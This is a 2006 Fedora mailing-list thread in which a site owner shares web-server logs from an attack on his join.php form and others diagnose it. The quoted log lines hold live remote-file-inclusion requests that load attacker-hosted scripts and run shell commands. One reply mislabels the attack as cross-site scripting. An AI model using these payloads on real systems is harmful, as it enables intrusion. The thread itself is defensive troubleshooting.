-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote: > On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote: > > > > > On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote: > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > Hash: SHA1 > > > > > > > > On Tue, 23 May 2006 00:14:32 +0000 > > > > replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote: > > > > > i haven't been following this topic in great detail, but i suspect > > > > > that you have a form on your site that is being exploited for "form > > > > > spam". if you're not familiar with this, search google for "form > > > > > spam". > > > > > > > > > > - Rick > > > > > > > > > > > > Rick, > > > > Thank you, No, I have not heard of this. > > > > > > I don't think that's what this is. Form spam takes advantage of > > > poorly-coded mail/contact forms and uses them to send mail to recipients > > > other than those intended by the form designer. > > > > > > What's happening here is that the spammer is running their own code > > > (downloaded into /tmp) to send the mail, a rather more serious > > > situation. > > > > > > Paul. > > > > > I might not know too much but I really think they are using my forms. I > > found quite a few log entries. Here are a few. > > 81.199.173.8 - - [22/May/2006:18:57:51 -0400] > > "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? > > HTTP/1.0" 200 5923 > > > > AOL: > > 172.179.33.217 - - [21/May/2006:07:58:01 -0400] > > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id > > HTTP/1.1" 200 2374 > > 172.179.33.217 - - [21/May/2006:07:58:20 -0400] > > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w > > HTTP/1.1" 200 2412 > > 172.179.33.217 - - [21/May/2006:07:58:34 -0400] > > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp > > HTTP/1.1" 200 2323 > > > > And the xpl.netmisphere2.com site has hacking information: > > http://xpl.netmisphere2.com/ I think this outta be illegal!! > > Looks like an exploit of a cross-site scripting vulnerability in your > join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP > script that gets injected into your form, it's not an image at all. > > You need to turn off that form until you can get a fixed version of that > application. And of course reinstall that system. > > Paul. > Thanks Paul, That is what I thought. I am writing my own topsites anyway, so that is no big deal. I will be deleting the other one. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEczXHfw3TK8jhZrsRAnILAKCH0SHKRpaagUi3Fe4oJSiUWDvC5wCaAuCQ 5sR75hAfYXAmF2Cjh5suKfo= =4buC -----END PGP SIGNATURE----- -- fedora-list mailing list fedora-list@xxxxxxxxxx To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list